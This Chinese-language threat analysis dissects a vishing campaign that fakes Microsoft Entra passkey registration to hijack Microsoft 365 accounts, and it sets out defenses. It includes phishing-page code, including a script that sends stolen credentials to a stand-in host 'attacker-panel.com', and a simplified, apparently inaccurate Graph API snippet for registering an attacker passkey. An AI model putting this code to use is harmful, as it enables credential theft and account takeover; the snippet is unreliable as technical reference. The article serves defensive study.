摘要
针对 2026 年 4 月以来 O-UNC-066 威胁组织发起的新型语音钓鱼(Vishing)攻击,本文深入剖析其伪造 Microsoft Entra 通行密钥注册流程、劫持 Microsoft 365 账户的技术机理与攻击链路。该攻击以 “推进无密码安全升级” 为伪装,结合实时人工交互与定制化钓鱼工具包,绕过传统多因素认证(MFA),实现攻击者可控通行密钥的恶意注册,最终达成数据窃取与勒索目的。本文从攻击背景、技术流程、核心缺陷、防御策略四方面展开研究,结合代码示例揭示攻击技术细节,总结防御体系构建路径,为企业应对此类高级身份欺诈威胁提供技术参考与实践指引。
1 引言
随着企业数字化转型深化,Microsoft 365 成为全球超 85% 财富 500 强企业的核心办公平台,其身份认证体系 Microsoft Entra ID(原 Azure AD)承载着账户安全与权限管控的核心职能。为抵御传统密码泄露与钓鱼攻击风险,微软大力推广通行密钥(Passkey)无密码认证技术,该技术基于 FIDO2 协议,具备抗钓鱼、不可复制的安全特性,被视为身份认证领域的重要安全升级。
然而,安全技术的普及过程往往伴随新型攻击手段的衍生。2026 年 4 月,Okta 威胁情报团队监测到 O-UNC-066 威胁组织发起的定向攻击活动,该组织隶属于 Pink 勒索集团,针对食品饮料、科技、医疗、汽车、建筑及航空等多行业企业,以语音钓鱼为核心手段,伪造 Microsoft Entra 通行密钥注册流程,诱导用户完成恶意认证操作,最终劫持企业 Microsoft 365 账户。
与传统钓鱼攻击窃取凭证或 MFA 验证码的单一目标不同,此次攻击呈现 “伪装性强、交互实时、链路完整、危害持久” 的特征。攻击者并非直接破解通行密钥技术,而是利用企业推广无密码认证的业务场景与用户对官方安全流程的信任,通过定制化 PHP 钓鱼工具包实时适配用户 MFA 类型,在用户完成 “虚假注册” 操作的同时,秘密注册攻击者可控的通行密钥,实现对目标账户的持久化未授权访问。
反网络钓鱼技术专家芦笛指出,此次攻击突破了传统钓鱼攻击的技术边界,标志着身份欺诈已进入 “利用安全升级流程实施攻击” 的新阶段。攻击者将微软主导的安全推广活动转化为攻击入口,结合语音社交工程与实时技术操控,形成 “人机协同” 的高级攻击模式,其危害远超普通钓鱼攻击,一旦企业账户被劫持,核心业务数据、敏感财务信息及客户资料将面临泄露与勒索风险。
本文以 O-UNC-066 组织的攻击活动为研究对象,基于 The Hacker News 等权威安全媒体披露的技术细节,系统拆解攻击全链路,分析技术漏洞与人性弱点的耦合作用,提供可复现的技术代码示例,构建针对性防御体系,为企业抵御此类高级身份钓鱼攻击提供理论支撑与实践方案。
2 攻击背景与核心要素
2.1 攻击组织与活动范围
此次攻击的发起组织被 Okta 追踪命名为 O-UNC-066,隶属于知名网络勒索集团 Pink,该集团长期专注于企业数据窃取与勒索攻击,擅长利用社交工程与定制化恶意工具突破企业防线。攻击活动自 2026 年 4 月启动,截至 7 月已覆盖全球多个国家和地区的数十家企业,行业分布集中于食品饮料、科技研发、医疗健康、汽车制造、建筑工程及航空运输等领域,此类行业普遍存在核心数据密集、员工安全意识参差不齐、依赖 Microsoft 365 协同办公的特点,成为攻击者的重点目标。
2.2 攻击核心载体:伪造通行密钥注册流程
通行密钥(Passkey)是微软基于 FIDO2 协议推出的无密码认证技术,用户通过设备(手机、安全密钥)生成唯一密钥对,公钥存储于 Microsoft Entra ID,私钥留存于用户设备,认证时无需输入密码,仅需设备验证即可完成登录,具备抗钓鱼、防泄露的安全优势。微软为推动通行密钥普及,允许管理员配置注册推广策略,在用户登录时弹窗提示注册通行密钥,这一正常安全推广流程成为攻击者的核心伪装载体。
攻击者注册包含 “passkey” 关键词的仿冒域名(如microsoft-passkey-security.com),搭建与微软官方界面高度一致的通行密钥注册页面,从视觉、流程、交互逻辑全方位复刻官方流程,普通用户难以通过界面细节辨别真伪。
2.3 攻击关键手段:语音钓鱼(Vishing)
语音钓鱼(Vishing)是传统电话诈骗与网络钓鱼的结合体,攻击者通过电话沟通实施社交工程,利用语音传递的信任度诱导用户执行恶意操作。此次攻击中,攻击者精准把握企业 IT 运维场景特点,伪装成企业 IT 支持团队或安全部门人员,以 “公司强制推进无密码安全升级、需紧急注册通行密钥保护账户安全” 为话术,降低用户警惕性。
相较于邮件、短信钓鱼,语音钓鱼具备三大核心优势:一是即时交互性,攻击者可实时回应用户疑问,消除用户疑虑;二是信任传递性,语音沟通更易建立权威感,用户对 “内部 IT 人员” 的信任度远高于陌生短信链接;三是场景适配性,贴合企业内部安全通知的沟通场景,伪装性极强。
2.4 攻击工具:定制化 PHP 钓鱼工具包
O-UNC-066 组织使用基于 PHP 开发的定制化钓鱼工具包,该工具包采用面板化控制架构,攻击者通过后台面板实时操控攻击流程,适配不同用户的安全配置。工具包具备三大核心功能:一是界面动态复刻,实时同步微软官方通行密钥注册页面样式,规避静态特征检测;二是 MFA 自适应,可自动识别用户账户配置的 MFA 类型(TOTP、推送通知、短信验证码),动态展示对应虚假验证页面;三是实时数据传输,将用户输入的凭证、MFA 验证码实时同步至攻击者后台,支持攻击者同步操作官方系统。
3 攻击技术流程详细拆解
此次攻击全链路分为前期准备、语音诱导、虚假认证、密钥注册、数据窃取与勒索五大阶段,各阶段衔接紧密,形成完整闭环,核心技术操作集中于虚假认证与密钥注册阶段,以下结合技术细节与代码示例逐一拆解。
3.1 前期准备阶段
攻击者在发起攻击前完成三项核心准备工作,为后续攻击落地奠定基础。
目标信息收集:通过公开渠道(企业官网、社交平台、员工通讯录)收集目标企业员工姓名、职位、企业邮箱域名、Microsoft 365 租户信息及 IT 部门沟通话术,确保语音诱导环节的话术贴合企业实际场景。
仿冒域名与页面搭建:注册包含 “microsoft”“passkey”“security” 等关键词的仿冒域名,规避域名黑名单检测;基于 PHP 搭建钓鱼网站,复刻微软 Entra 通行密钥注册页面的 HTML、CSS 样式,确保页面布局、颜色、按钮文字与官方完全一致,仅隐藏恶意逻辑代码。
钓鱼工具包配置:在 PHP 工具包后台配置目标企业域名、MFA 适配规则、数据传输接口,设置加载页面延迟时间(通常 3-5 秒),为攻击者后台操作预留时间;配置 BIP 39 风格的恢复短语生成模块,用于转移用户注意力。
3.2 语音诱导阶段
此阶段核心目标是通过语音社交工程诱导用户点击仿冒链接,进入虚假注册流程,具体流程如下:
电话接入:攻击者使用网络电话伪装成企业内部号码,拨打目标员工电话,开口话术为 “您好,我是公司 IT 安全部,根据总部安全要求,需为您的 Microsoft 365 账户注册通行密钥,避免账户被攻击,这是强制安全升级,请您配合”。
疑虑化解:当用户提出疑问(如 “为何突然要求注册”“之前未收到通知”),攻击者以 “紧急安全补丁、针对近期钓鱼攻击防范、未注册将冻结账户” 等话术施压,同时发送包含仿冒域名的短信 / 企业微信消息,消息内容为 “通行密钥注册链接:[仿冒链接],点击后按提示操作,10 分钟内完成,否则影响办公”。
引导进入流程:确认用户点击链接后,攻击者告知用户 “页面加载可能较慢,请耐心等待,有任何问题随时说”,为后续虚假认证阶段的后台操作预留时间。
3.3 虚假认证阶段(核心技术环节)
用户点击仿冒链接后,进入攻击者搭建的虚假注册页面,此阶段攻击者通过 PHP 工具包实时适配用户 MFA 类型,窃取凭证与验证码,核心流程与技术实现如下:
加载页面伪装:用户访问链接后,工具包首先展示 3-5 秒的 “系统加载中”“正在连接微软安全服务器” 等虚假加载页面,一方面复刻官方流程,另一方面为攻击者后台登录官方 Microsoft 365 账户预留时间。
以下为加载页面核心代码示例:
<?php
// 虚假加载页面控制逻辑
$loadingTime = 3; // 加载时间3秒
sleep($loadingTime);
header("Location: login.php"); // 加载完成跳转至虚假登录页
?>
<!DOCTYPE html>
<html>
<head>
<title>Microsoft Entra 安全更新</title>
<style>
body { text-align: center; padding-top: 50px; }
.loading { font-size: 18px; color: #0078d4; }
</style>
</head>
<body>
<div class="loading">正在连接微软安全服务器,请稍候...</div>
</body>
</html>
窃取账户凭证:加载完成后跳转至虚假登录页面,提示用户输入 Microsoft 365 邮箱账号与密码,用户输入后,凭证通过 AJAX 实时传输至攻击者后台数据库,同时工具包提示 “正在验证账号密码”。
以下为凭证窃取核心代码示例:
// 前端凭证提交与传输逻辑
document.getElementById("loginForm").addEventListener("submit", function(e) {
e.preventDefault();
const username = document.getElementById("username").value;
const password = document.getElementById("password").value;
// 实时传输凭证至攻击者后台
fetch("https://attacker-panel.com/steal-creds.php", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ username, password })
}).then(res => res.json()).then(data => {
if(data.success) {
// 凭证传输成功,跳转至MFA验证页
window.location.href = "mfa.php";
}
});
});
自适应 MFA 验证:攻击者后台获取凭证后,同步登录官方 Microsoft 365 账户,触发 MFA 验证;同时钓鱼工具包根据用户账户配置的 MFA 类型,动态展示对应的虚假验证页面。若用户配置 TOTP(如微软验证器),则展示 6 位数字输入框;若配置推送通知,则展示 “请点击手机推送的允许按钮”;若配置短信验证,则展示 “请输入短信验证码”。
窃取 MFA 验证码:用户输入 MFA 验证码后,工具包实时传输至攻击者后台,攻击者将验证码输入官方 MFA 验证页面,完成身份认证,登录用户账户。
3.4 恶意通行密钥注册阶段(核心危害环节)
完成 MFA 验证后,用户进入虚假通行密钥注册页面,此阶段核心目标是转移用户注意力,秘密注册攻击者可控的通行密钥,具体流程如下:
虚假注册引导:页面提示 “请点击下方按钮注册通行密钥,注册后请保存恢复短语,用于账户找回”,同时展示 BIP 39 风格的 12 位英文恢复短语(如 “apple banana cloud date”),告知用户 “务必记录保存,丢失将无法找回账户”。
注意力转移:用户专注记录恢复短语时,后台同步执行恶意操作 —— 攻击者在已登录的用户账户中,发起通行密钥注册请求,使用攻击者控制的安全密钥或设备完成密钥注册,将攻击者设备的公钥绑定至用户 Microsoft Entra 账户。
注册成功伪装:密钥注册完成后,虚假页面提示 “通行密钥注册成功,您的账户已升级为无密码安全保护,可关闭页面”,用户误以为操作完成,实际账户已被绑定攻击者可控的通行密钥。
以下为恶意密钥注册辅助代码示例(模拟后台同步操作):
# 攻击者后台模拟通行密钥注册(基于微软Graph API)
import requests
import json
# 攻击者获取的用户访问令牌
access_token = "USER_ACCESS_TOKEN_FROM_STEAL"
headers = {
"Authorization": f"Bearer {access_token}",
"Content-Type": "application/json"
}
# 恶意注册攻击者设备的通行密钥
passkey_data = {
"displayName": "Attacker-Passkey",
"publicKey": "ATTACKER_DEVICE_PUBLIC_KEY"
}
response = requests.post(
"https://graph.microsoft.com/v1.0/me/passkeys",
headers=headers,
data=json.dumps(passkey_data)
)
if response.status_code == 201:
print("恶意通行密钥注册成功")
3.5 数据窃取与勒索阶段
攻击者成功注册可控通行密钥后,无需依赖用户凭证或 MFA,即可随时登录用户 Microsoft 365 账户,实施后续恶意操作。
数据窃取:重点窃取 SharePoint、OneDrive 中的企业核心文档、财务报表、客户信息及邮箱敏感邮件,同时导出账户通讯录与权限配置信息。
权限提升:若用户账户具备管理员权限,攻击者将进一步提升权限,创建后门账户、修改安全策略、禁用 MFA 保护,实现对企业租户的全面控制。
勒索攻击:窃取核心数据后,攻击者向企业发送勒索邮件,威胁公开泄露数据,要求企业支付比特币等加密货币赎金,Pink 集团通常设定数万美元至数十万美元不等的赎金金额。
4 攻击核心缺陷与漏洞分析
此次攻击并非利用 Microsoft Entra ID 的零日漏洞,而是安全技术推广流程漏洞、身份认证机制设计缺陷与人性弱点的耦合产物,核心缺陷可分为技术层面与管理层面两类。
4.1 技术层面缺陷
通行密钥注册流程无强身份校验:微软 Entra ID 允许已通过密码 + MFA 认证的用户直接注册通行密钥,未设置二次身份校验或管理员审批环节。攻击者通过窃取凭证与 MFA 验证码完成初始认证后,可直接发起密钥注册请求,系统无法区分是用户本人操作还是攻击者操作。
钓鱼页面无权威域名校验:微软官方通行密钥注册页面仅存在于login.microsoftonline.com等官方域名,但系统未强制校验注册请求的域名来源。攻击者可通过任意仿冒域名复刻页面,诱导用户提交信息,官方系统无法拦截非官方域名发起的认证请求Microsoft。
MFA 适配机制被滥用:Microsoft Entra ID 支持多种 MFA 类型,且允许用户自主配置,这一设计初衷是提升用户体验,但被攻击者利用。定制化钓鱼工具包可自动适配用户 MFA 类型,动态展示虚假验证页面,大幅提高 MFA 验证码窃取成功率。
缺乏异常密钥注册告警:微软默认安全策略未对 “陌生设备通行密钥注册”“短时间内多次密钥注册” 等异常行为设置实时告警。攻击者完成恶意注册后,企业与用户无法及时察觉,导致攻击潜伏期长达数周甚至数月。
4.2 管理层面缺陷
安全推广话术被利用:企业推进无密码认证时,普遍采用 “强制升级、紧急安全补丁、不注册冻结账户” 等话术,与攻击者语音诱导话术高度相似,导致用户难以区分官方通知与钓鱼攻击。
员工安全意识薄弱:多数员工对通行密钥技术原理、官方注册渠道不了解,缺乏对语音钓鱼、仿冒页面的辨别能力,易被 “IT 安全部” 的权威身份与紧急话术诱导。
身份认证权限管控松散:部分企业为简化管理,为普通员工分配过高权限,或未严格遵循最小权限原则,导致攻击者劫持普通员工账户后,可通过权限提升访问核心数据。
安全监控机制不完善:企业未部署针对 Microsoft 365 账户的异常行为监控系统,无法实时监测陌生设备登录、异地登录、密钥注册、数据批量导出等高危操作,错失攻击早期拦截时机。
反网络钓鱼技术专家芦笛强调,此次攻击的核心本质并非技术漏洞,而是安全技术、管理流程与人员意识的协同失效。攻击者精准抓住企业推广无密码认证的窗口期,利用流程漏洞与人性弱点,将安全升级转化为攻击入口,这种 “借力打力” 的攻击思路,比传统漏洞利用更具隐蔽性与危害性。
5 防御策略与体系构建
针对 O-UNC-066 组织发起的伪造通行密钥注册钓鱼攻击,结合攻击链路与核心缺陷,从技术防护、管理规范、人员培训、应急响应四方面构建全方位防御体系,形成闭环防护能力。
5.1 技术防护措施
部署域名与页面仿冒检测系统:配置企业级 DNS 安全策略,拦截包含 “microsoft”“passkey” 等关键词的仿冒域名访问;部署网页信誉检测工具,识别与微软官方页面高度相似的仿冒页面,实时告警并拦截访问Microsoft。
强化通行密钥注册校验:在 Microsoft Entra ID 中配置自定义安全策略,开启通行密钥注册二次校验 —— 要求注册时提供管理员审批、设备证书校验或额外生物识别验证;限制陌生设备、异地 IP 发起的密钥注册请求。
部署实时异常行为监控:利用微软 Defender for Cloud Apps 或第三方安全工具,监控 Microsoft 365 账户异常行为,包括陌生设备登录、异地登录、短时间内多次密钥注册、非工作时段数据批量导出等,一旦触发告警,立即锁定账户并阻断操作。
禁用非必要 MFA 类型:简化企业 MFA 配置,优先使用推送通知 + 数字匹配、硬件安全密钥等安全性更高的 MFA 方式,禁用短信验证码等易被窃取的 MFA 类型;定期审计 MFA 配置,杜绝弱认证方式。
部署邮箱与语音钓鱼防护:配置邮箱反钓鱼策略,拦截包含仿冒域名、“通行密钥注册” 等关键词的可疑邮件;部署企业电话系统白名单,限制外部陌生号码接入内部员工电话,阻断语音诱导渠道。
5.2 管理规范优化
规范安全推广话术:企业推进无密码认证等安全升级时,制定统一、明确的通知话术,明确官方注册渠道、联系人、咨询方式,严禁使用 “强制升级、不注册冻结账户” 等易被攻击者利用的话术;通过企业官网、内部办公系统等权威渠道发布通知,避免单一电话、短信通知。
严格落实最小权限原则:对 Microsoft 365 账户权限进行全面审计,删除冗余权限,确保普通员工仅拥有办公所需的最小权限;管理员账户单独管理,开启多重防护,严禁用于日常办公。
定期安全配置审计:每周审计 Microsoft Entra ID 安全策略、MFA 配置、通行密钥注册记录,每月开展账户权限审计、异常登录日志审计,及时发现并处置潜在风险。
建立供应商安全审核机制:若企业使用第三方身份管理工具或服务,严格审核供应商安全资质,定期开展安全渗透测试,避免第三方工具引入安全漏洞。
5.3 人员安全培训
开展专项钓鱼攻击培训:定期组织员工学习语音钓鱼、仿冒通行密钥注册等新型钓鱼攻击案例,讲解攻击话术、仿冒页面特征、官方注册渠道,提升员工辨别能力。
明确安全操作规范:告知员工微软官方通行密钥注册仅通过login.microsoftonline.com域名,不会通过电话、短信发送外部链接;官方 IT 人员不会要求员工提供密码、MFA 验证码或记录恢复短语;遇到可疑情况,立即通过企业内部安全热线或 IT 部门核实。
模拟钓鱼演练:每季度开展语音钓鱼、邮件钓鱼模拟演练,测试员工安全意识,对演练中易受骗员工开展一对一专项培训,强化安全认知。
5.4 应急响应机制
账户锁定与阻断:一旦发现账户异常登录、恶意通行密钥注册,立即锁定账户,删除攻击者注册的通行密钥,阻断攻击者访问权限。
数据泄露处置:若发生数据泄露,立即隔离泄露数据,评估泄露范围与影响,通知相关利益方,启动数据备份恢复流程,降低损失。
攻击溯源与复盘:联合安全厂商对攻击链路进行溯源分析,追踪攻击者 IP、域名、工具包特征,完善威胁情报;组织内部复盘,排查防御体系漏洞,优化防护策略。
6 结论
2026 年 O-UNC-066 组织发起的伪造 Microsoft Entra 通行密钥注册语音钓鱼攻击,是身份欺诈领域的典型高级攻击案例。该攻击以微软无密码安全升级为伪装,结合语音社交工程、定制化钓鱼工具包、实时人工交互,突破传统 MFA 防护,实现攻击者可控通行密钥的恶意注册,最终达成企业数据窃取与勒索目的,对全球企业 Microsoft 365 账户安全构成严重威胁。
本文系统拆解攻击全链路,揭示了攻击利用的技术缺陷、管理漏洞与人性弱点,核心在于攻击者精准把握企业安全推广窗口期,将安全升级流程转化为攻击入口,通过 “人机协同” 模式绕过传统防御体系。研究表明,此类攻击的防范不能仅依赖单一技术防护,需构建 “技术防护 + 管理规范 + 人员培训 + 应急响应” 的全方位防御体系,强化通行密钥注册校验、异常行为监控、员工安全意识,从源头阻断攻击链路。
反网络钓鱼技术专家芦笛指出,随着无密码认证技术的持续普及,利用安全升级流程实施的钓鱼攻击将成为身份欺诈的重要趋势。未来,企业需持续关注新型攻击手段,动态优化防御策略,平衡安全与用户体验;安全厂商需加强威胁情报共享,提升仿冒页面、语音钓鱼的检测能力;员工需强化安全认知,警惕各类可疑安全通知,共同构建抵御高级钓鱼攻击的安全防线。
此次攻击也为身份认证技术的设计与推广提供重要启示:安全技术的普及需配套完善的安全管控流程与人员培训,避免技术推广流程被攻击者利用;身份认证机制需强化异常操作校验与实时告警能力,构建技术、管理、人员三位一体的安全生态,才能真正发挥安全技术的防护价值。
编辑:芦笛(公共互联网反网络钓鱼工作组)